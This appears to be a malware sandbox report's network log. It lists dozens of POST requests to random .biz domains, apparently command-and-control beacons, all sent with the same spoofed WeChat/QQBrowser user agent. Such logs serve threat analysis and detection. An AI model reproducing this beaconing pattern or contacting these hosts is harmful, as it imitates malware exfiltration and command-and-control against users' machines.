Source: global traffic	HTTP traffic detected: POST /bjgrt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /tpndpotka HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dona HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qylgmshijgs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nur HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /wveyxjtgsxs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /klflkg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /cisadtlsyrfn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xymnprgj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /cjqgdtkxtfqqm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hmiutucdfnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yhjy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /om HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gho HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ulgmbpj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /leqj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ixcnnbyrmpnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /iuqfwfkapu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ymsikktgwjcaw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rvfsblrqhy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /wiuuagnokpngbsx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /kfmcpedbjr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /rifmhdkgmasf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /tbncyidxtibogxq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /eakdwqhsn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /bcjrqnssupbqc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /taks HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qbllddvxueecww HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /jaypbwnkuad HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /om HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /cnub HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /udqtfnpdyqh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /kacads HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nuyubw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /rn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /enxhgeexxmda HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /pry HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xrcr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /uku HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sbnab HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dvarulpg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /tfbvwglkixk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /noubyejh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /cdrlubbsf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qmfujjy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dxlhs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /rgkgvuyxljjatio HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ki HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /bq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vhecjxbkixjuljyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /cgkctkdxtvumt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /nmqrslobvguxfrkm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /esgffqvf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /eviqjrwjsc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xyrpanl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /aoayitmlcu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ceercoregt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xgyulldvremqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jhppqdqsxkpre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xsnbcmvbhjayqro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /myrpsocdgnp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /pm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /jntykoegrmymca HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nwuwfpndyaon HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
